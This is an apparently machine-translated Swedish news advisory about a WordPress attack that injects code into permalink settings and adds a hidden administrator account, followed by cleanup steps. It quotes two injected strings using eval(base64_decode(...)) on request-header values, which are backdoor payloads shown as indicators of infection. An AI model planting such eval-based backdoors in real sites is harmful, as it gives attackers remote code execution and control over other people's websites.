WordPress SQL Injection - Senaste Attack

WordPress SQL Injection - Senaste Attack / Nyheter

Många webbplatser påverkas av en ny SQL-attack där koder injiceras på din webbplats. Denna MySQL-injektion påverkar dina permalinks genom att göra dem ineffektiva. Som ett resultat kommer dina blogginläggsadresser inte att fungera. Många WordPress-bloggar var inriktade i denna attack, tack vare Andy Soward för att vi skulle få det till vår uppmärksamhet.

Det fanns en av följande koder som lagts till i din permalinkstruktur på grund av denna attack:

% & ($ Eval (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%

”/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Dessa citat bifogade alla permalink på din webbplats och det kan bara ändras om det tas bort manuellt.

För att åtgärda detta går du till:

Inställningar> Permalinks och ta bort ovanstående kod och ersätt standardkoden.

Nästa sak du behöver göra är att gå till Användare. Du kommer att se att det finns mer än en administratör. Du kommer inte se sitt namn listade, men du kommer se räkningen ökat. Så vad du behöver göra är att titta på alla användare och hitta den sista som registrerade. Sätt musen över den användaren och få länken. Ändra koden userid = genom att lägga till 1 till det numret. Så om den sista användaren som du kan se var användaren # 2 lägg sedan till 1 och gör den 3. Du borde hitta den dolda administratören har en konstig kod som förnamn. Ta bort koden och gör honom till en abonnent. Återvänd sedan och ta bort honom.

Detta borde lösa problemet. Du kan också ta bort honom genom att helt enkelt gå till din PHPMyAdmin. Eftersom du kommer att se användaren där.

Vi ville bara få ut den här nyheten så snart vi kan, så våra användare kan uppdateras. Se till att du kontrollerar att din blogg inte är infekterad. Vi hoppas att WordPress kommer snart ut.

Också om du inte har genomfört några av dessa åtgärder för att säkra ditt WordPress Admin-område.